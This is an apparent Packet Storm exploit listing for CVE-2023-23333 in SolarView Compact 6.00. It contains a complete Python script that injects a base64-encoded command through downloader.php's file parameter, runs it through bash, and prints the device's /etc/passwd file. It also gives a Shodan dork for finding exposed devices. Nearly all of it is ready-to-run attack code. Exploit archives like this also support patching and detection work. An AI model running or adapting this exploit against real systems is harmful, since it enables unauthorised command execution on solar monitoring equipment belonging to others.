packetstorm | ByteHunter | PACKETSTORM:177576
Mar 14, 2024 - 12:00 a.m.

SolarView Compact 6.00 Command Injection

2024-03-14 00:00:00
ByteHunter
packetstormsecurity.com
solarview compact
command injection
cve-2023-23333
shodan
base64
bash
vulnerability

AI Score

7.4

Confidence

Low

EPSS

0.961

Percentile

99.5%

```python
#- Exploit Title: SolarView Compact 6.00 - Command Injection
#- Shodan Dork: http.html:"solarview compact"
#- Exploit Author: ByteHunter
#- Email: [email protected]
#- Version: 6.00
#- Tested on: 6.00
#- CVE : CVE-2023-23333


import argparse
import requests

def vuln_check(ip_address, port):
    # Command injection through the "file" parameter of downloader.php.
    # The base64 string decodes to "cat /etc/passwd".
    url = f"http://{ip_address}:{port}/downloader.php?file=;echo%20Y2F0IC9ldGMvcGFzc3dkCg%3D%3D|base64%20-d|bash%00.zip"
    response = requests.get(url)
    if response.status_code == 200:
        output = response.text
        # "root" in the body means the command output was returned in the response.
        if "root" in output:
            print("Vulnerability detected: Command Injection possible.")
            print(f"passwd file content:\n{response.text}")
        else:
            print("No vulnerability detected.")
    else:
        print("Error: Unable to fetch response.")

def main():
    parser = argparse.ArgumentParser(description="SolarView Compact Command Injection")
    parser.add_argument("-i", "--ip", help="IP address of the target device", required=True)
    parser.add_argument("-p", "--port", help="Port of the target device (default: 80)", default=80, type=int)
    args = parser.parse_args()

    ip_address = args.ip
    port = args.port
    vuln_check(ip_address, port)

if __name__ == "__main__":
    main()
```
